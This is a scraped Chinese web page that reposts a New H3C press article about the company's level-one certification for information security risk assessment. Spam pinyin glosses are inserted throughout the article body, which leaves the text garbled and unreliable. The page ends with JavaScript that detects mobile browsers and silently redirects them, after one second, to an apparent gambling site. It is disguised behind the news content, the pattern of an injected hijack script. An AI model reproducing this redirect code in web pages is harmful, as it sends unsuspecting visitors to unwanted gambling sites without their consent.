mg游戏推荐

安全服务能力再升级——新华三通过信息安全风险评估一级资质认证

2019-12-24 18:34:49 mg游戏推荐信(xin)息(xi) 35

图片关键词

图片关键词

图片关键词

随着数字经济的高(gao)速发(fa)展,网络安(an)(an)全威胁日益(yi)严重(zhong),作(zuo)为信息(xi)(xi)(xi)安(an)(an)全建设的重(zhong)要内容,信息(xi)(xi)(xi)安(an)(an)全风(feng)险(xian)评估受到各个行业重(zhong)视。信息(xi)(xi)(xi)安(an)(an)全风(feng)险(xian)评估服务(wu)(wu)(wu)一级资(zi)质是衡量服务(wu)(wu)(wu)提供者服务(wu)(wu)(wu)能(neng)力的最高(gao)要求。

风险评估服务提供方的服务能力主要从以下四个方面体现:基本资格、服务管理能力、服务技术能力和服务过程能力。资质认证专家认为,新(xin)华(hua)三的项(xiang)目(mu)(mu)案(an)例文档(dang)体系规(gui)范并且完(wan)整,从(cong)过程文档(dang)到最终交付(fu)文档(dang),严格按照(zhao)风险评估要求进(jin)行执行。此外,新(xin)华(hua)三的项(xiang)目(mu)(mu)管(guan)理比较科学规(gui)范,依(yi)托(tuo)新(xin)华(hua)三成熟(shu)的服务管(guan)理体系,新(xin)华(hua)三安全(quan)服务交付(fu)在项(xiang)目(mu)(mu)启动、规(gui)划、执行、监控(kong)到最后(hou)项(xiang)目(mu)(mu)收(shou)尾(wei)的五大(da)阶段进(jin)行科学管(guan)理,安全(quan)服务项(xiang)目(mu)(mu)交付(fu)质量一直保持在领先水平。

图片关键词

本文转(zhuan)自《新华三(san)》

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();